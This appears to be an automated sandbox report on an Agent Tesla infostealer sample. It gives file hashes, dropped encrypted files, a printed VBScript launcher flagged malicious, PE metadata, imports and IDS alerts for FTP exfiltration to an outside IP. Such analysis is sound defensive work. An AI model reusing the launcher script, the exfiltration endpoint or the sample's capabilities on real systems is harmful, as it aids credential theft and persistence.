                                  SHA-512:A855EA1D71CCE1F4F0265E4238B313FB284D4037677EF2524E6ED1DB97FCAAAC83FAB90F582B8B974B5BF24C62F46237FC2495F10B7CEB2E4B3EB6B556D167AA
                                  Malicious:false
                                  Preview:EA06.....B9.y...1.Ni..".X..@.J..y...U...ng ..OH.4..=.j.....z../...:.."...zkK..-.I..sZ..sx..#....{.:#...U...R..'f.....i..c..W.....L.s*|.7.V..ZH.."~Z.b...46S..r.R.]..I.JsJ.4...sW*.^kC...>o........4..U.8..+.....'T....A..'.._<.N.....~.JsF.....9.....c....0.....-...l...'z3N..c2.\.....N]p.Bf..y'@...8.D.J.U.t..@...A3...N|.:.@....&@....7...?m-2s%.T..@.raR...=..Ig.#..}o....K.M...E{.4.........C..e....A.....1.P..8..;M....9.#...H...="....|[{T.D..RX.....w:.=..E.\.s..rQ..g'.....j.Y2..5.-..p#.i.+...7.I...|.O.2....6..&..\.i8..v.\.C)..v*.[.".T.W..9U...~..}....g...eL....h.0....hN.4....G.A$.......{(.Qd..*...L......%.m..n.2L...F.kvV...I..[........6.....J..o$"...._.-..~.w....z...@*T....U..f4J..:.A(w.f......y.&{N.....^.-.........e..K..Y2.y.*.B.:..l.Z.8p@.M.8.h.i..Z..c...#....wP...*\.."..'.{.V-a.Rg.i...(s:...1.......ER.."|.D......5).2...V%6:..kz.S.6jT..h..&r.:sG.L..@.LN......5..o G..X.h_et9........,.kA.F.....=.V*.J.vO..V8...b.%..i.fe*s...+4.]..{.R...J.U......a8..i...Z.
                                  Process:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):15164
                                  Entropy (8bit):7.586580449950993
                                  Encrypted:false
                                  SSDEEP:384:E9/Rtsnvg+rszHYJ3RfCcQXtlJNUM0/kMr8Ad9GTbx:ERA4+rszmCVXtlJNv0cMr8Aqp
                                  MD5:66846AEF53EF56251022A8A41B58BCBD
                                  SHA1:18C07153E15706C74B9ABB00A181874BD32C8CC6
                                  SHA-256:9DE04BF5A68396247654016C9108D6B48A452C065B7ABECBB0A9CB27890813CF
                                  SHA-512:4DAF1E3C0BDB017E77EA42C86315CE8F19A3924615A781101BEE04CED3C263FFF26BA3CF77BE6795464681E557FAA1E5CEDAC69F49843DC3ED2E4541F0F098BA
                                  Malicious:false
                                  Preview:EA06.....Zo.........SP.n......5e...`.....|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....|.0...&d.....Hz..a....l?..uo.....P......V0....j......|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...|.*..<..aw.].3c..H.@B?...G..1...' ....k|.A.O..#.....}V`....#..H|.P!..d....0z....Y..>K..G.*/....G.7c.H..b....W..1....?.01..b.!...@.?..o.F|....p9......S.!..nb.!....zb0..
                                  Process:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):145858
                                  Entropy (8bit):7.932961480786955
                                  Encrypted:false
                                  SSDEEP:3072:ITVCXomKKjaplxH0y4SemHQADsuAeAfrMv6yn/wi/EuHmo4GIG1gpqq:kC43KeF0y4kHPw/fQ6K/wrloRgpqq
                                  MD5:D0303F79E60A6141398F02F8633A1C84
                                  SHA1:CB3A8F2514B107AF77A31A282E976FA6F858012C
                                  SHA-256:403C9C5FE0F66031019230A513EE618B1ABA961430C9E496D88F2A8D09903122
                                  SHA-512:A855EA1D71CCE1F4F0265E4238B313FB284D4037677EF2524E6ED1DB97FCAAAC83FAB90F582B8B974B5BF24C62F46237FC2495F10B7CEB2E4B3EB6B556D167AA
                                  Malicious:false
                                  Preview:EA06.....B9.y...1.Ni..".X..@.J..y...U...ng ..OH.4..=.j.....z../...:.."...zkK..-.I..sZ..sx..#....{.:#...U...R..'f.....i..c..W.....L.s*|.7.V..ZH.."~Z.b...46S..r.R.]..I.JsJ.4...sW*.^kC...>o........4..U.8..+.....'T....A..'.._<.N.....~.JsF.....9.....c....0.....-...l...'z3N..c2.\.....N]p.Bf..y'@...8.D.J.U.t..@...A3...N|.:.@....&@....7...?m-2s%.T..@.raR...=..Ig.#..}o....K.M...E{.4.........C..e....A.....1.P..8..;M....9.#...H...="....|[{T.D..RX.....w:.=..E.\.s..rQ..g'.....j.Y2..5.-..p#.i.+...7.I...|.O.2....6..&..\.i8..v.\.C)..v*.[.".T.W..9U...~..}....g...eL....h.0....hN.4....G.A$.......{(.Qd..*...L......%.m..n.2L...F.kvV...I..[........6.....J..o$"...._.-..~.w....z...@*T....U..f4J..:.A(w.f......y.&{N.....^.-.........e..K..Y2.y.*.B.:..l.Z.8p@.M.8.h.i..Z..c...#....wP...*\.."..'.{.V-a.Rg.i...(s:...1.......ER.."|.D......5).2...V%6:..kz.S.6jT..h..&r.:sG.L..@.LN......5..o G..X.h_et9........,.kA.F.....=.V*.J.vO..V8...b.%..i.fe*s...+4.]..{.R...J.U......a8..i...Z.
                                  Process:C:\Users\user\Desktop\RHOqJ5BrHW.exe
                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                  Category:dropped
                                  Size (bytes):178198
                                  Entropy (8bit):3.174329330978397
                                  Encrypted:false
                                  SSDEEP:48:sb3feqfCpfS6ftqfA0f9fWf9fZ1fi20fq0fFfY6fofi51fK0fi0fCfZ1fK0f70fg:iaNibHCIL8aDfffXz6w43Ck/sqoHklX
                                  MD5:A09D7CF7B10B8AF8265563ECFD0DEC02
                                  SHA1:8603B072F64A75D50663F4BA60F94DE0C7E59FD4
                                  SHA-256:01937F48007048229842F0743CC2D2F80330289E8A3FA26DBF32A13D6C95B339
                                  SHA-512:029C037CD58C55420C34BD68CC467947B877888E26E4C84D8FA68F97D667D7EE4A6DED7AC5152BA0C0C61182205B58D9F4A5CC6C409EDFDFAB4074DE3AB49764
                                  Malicious:false
                                  Preview:hixjs0hixjsxhixjs5hixjs5hixjs8hixjsbhixjsehixjschixjs8hixjs1hixjsehixjschixjschixjschixjs0hixjs2hixjs0hixjs0hixjs0hixjs0hixjs5hixjs6hixjs5hixjs7hixjsbhixjs8hixjs6hixjsbhixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs8hixjs4hixjsbhixjs9hixjs6hixjs5hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixjs8hixjs6hixjsbhixjsahixjs7hixjs2hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs5hixjs5hixjs8hixjs8hixjsbhixjs8hixjs6hixjsehixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs8hixjsahixjsbhixjs9hixjs6hixjs5hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixjs8hixjschixjsbhixjsahixjs6hixjschixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs5hixjs5hixjs8hixjsehixjsbhixjs8hixjs3hixjs3hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs9hixjs0hixjsbhixjs9hixjs3hixjs2hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixj
                                  Process:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):288
                                  Entropy (8bit):3.4322289179426537
                                  Encrypted:false
                                  SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX14lDRw1blanriIM8lfQVn:DsO+vNlzQ1oFwBlYmA2n
                                  MD5:4794EC5AFF4E7110E4946325ABF2DEE2
                                  SHA1:2DD0F602A10438D64DF4CACDE7FE878588B44F7F
                                  SHA-256:E684CB832D2CB7130B1627CDEE3F6B2C6D9DCC26954EC436697B37D1915B6DB8
                                  SHA-512:051ABECD3344C073F810934F8D451B6D879C30707C33A0B9F37F707FC3E9593F9F172FB4432B5BBD908BC23701EAD26410E1474ADE773C53E6F5A94091BB92D7
                                  Malicious:true
Preview (UTF-16LE, decoded):
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "C:\Users\alfons\AppData\Local\Lityerses\unjuridically.exe", 1
Set WshShell = Nothing
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):6.894564802528682
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.70%
                                  • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:RHOqJ5BrHW.exe
                                  File size:1'036'800 bytes
                                  MD5:bc7fee37d8d779b635750bce96b9ecd9
                                  SHA1:7ea7eb2001c6a29d93f2d780dbf2ef37070689be
                                  SHA256:382b40ce3e7d7fc44a80d1b9190914a401c968be78c7115a8e4e3ccd40b8888d
                                  SHA512:1fcafcd2fc26508f1c18d5261cfad45a43b98dc6bb67665c8c3d89af120cb1eaad7204b46901424927f034ff3f9e8f72724bd3a5250e79c7ec5457ecfd6eb70e
                                  SSDEEP:12288:Jtb20Qc3lT7af41ePBRYuQLKpqeUhbTv5OFgNDPPpHrYPTYC2ajbP50s3o32VV6A:Jtb20pkaCqT5TBWgNjVYrpv13G+V6A
                                  TLSH:6B25BF2363DE8365C3B26273BA15B701AE7F782506B1F56B2FD4093DE820162525EB73
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                  Icon Hash:aaf3e3e3938382a0
                                  Entrypoint:0x425f74
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x6768EE06 [Mon Dec 23 04:58:46 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:c1d258acab237961164a925272293413
                                  Instruction
                                  call 00007F18E0DC4CCFh
                                  jmp 00007F18E0DB7CE4h
                                  int3
                                  int3
                                  push edi
                                  push esi
                                  mov esi, dword ptr [esp+10h]
                                  mov ecx, dword ptr [esp+14h]
                                  mov edi, dword ptr [esp+0Ch]
                                  mov eax, ecx
                                  mov edx, ecx
                                  add eax, esi
                                  cmp edi, esi
                                  jbe 00007F18E0DB7E6Ah
                                  cmp edi, eax
                                  jc 00007F18E0DB81CEh
                                  bt dword ptr [004C0158h], 01h
                                  jnc 00007F18E0DB7E69h
                                  rep movsb
                                  jmp 00007F18E0DB817Ch
                                  cmp ecx, 00000080h
                                  jc 00007F18E0DB8034h
                                  mov eax, edi
                                  xor eax, esi
                                  test eax, 0000000Fh
                                  jne 00007F18E0DB7E70h
                                  bt dword ptr [004BA370h], 01h
                                  jc 00007F18E0DB8340h
                                  bt dword ptr [004C0158h], 00000000h
                                  jnc 00007F18E0DB800Dh
                                  test edi, 00000003h
                                  jne 00007F18E0DB801Eh
                                  test esi, 00000003h
                                  jne 00007F18E0DB7FFDh
                                  bt edi, 02h
                                  jnc 00007F18E0DB7E6Fh
                                  mov eax, dword ptr [esi]
                                  sub ecx, 04h
                                  lea esi, dword ptr [esi+04h]
                                  mov dword ptr [edi], eax
                                  lea edi, dword ptr [edi+04h]
                                  bt edi, 03h
                                  jnc 00007F18E0DB7E73h
                                  movq xmm1, qword ptr [esi]
                                  sub ecx, 08h
                                  lea esi, dword ptr [esi+08h]
                                  movq qword ptr [edi], xmm1
                                  lea edi, dword ptr [edi+08h]
                                  test esi, 00000007h
                                  je 00007F18E0DB7EC5h
                                  bt esi, 03h
                                  jnc 00007F18E0DB7F18h
                                  movdqa xmm1, dqword ptr [esi+00h]
                                  Programming Language:
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [ASM] VS2012 UPD4 build 61030
                                  • [RES] VS2012 UPD4 build 61030
                                  • [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x34080 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf9000 | 0x6c4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | ede9d722bf5e27d1f93aaf9e53240a22 | False | 0.3183049704038997 | data | 5.682422502790088 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x34080 | 0x34200 | 6b1531235337d4e5a16b1920d56b90ba | False | 0.8729485161870504 | data | 7.749633155377708 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xf9000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc7b8 | 0x2b388 | data | | | 1.0003445704731349
RT_GROUP_ICON | 0xf7b40 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0xf7bb8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xf7bcc | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xf7be0 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xf7bf4 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0xf7cd0 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Import
KERNEL32.DLL | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
PSAPI.DLL | GetProcessMemoryInfo
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                  Language of compilation system | Country where language is spoken
                                  English | Great Britain
                                  Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                  2025-01-11T03:19:36.997199+0100 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.5 | 49708 | 162.241.62.63 | 21 | TCP
                                  2025-01-11T03:19:37.399129+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49714 | 162.241.62.63 | 35211 | TCP
                                  2025-01-11T03:19:37.404623+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49714 | 162.241.62.63 | 35211 | TCP
                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  Jan 11, 2025 03:19:21.069190979 CET | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                                  Jan 11, 2025 03:19:21.074932098 CET | 80 | 49704 | 208.95.112.1 | 192.168.2.5
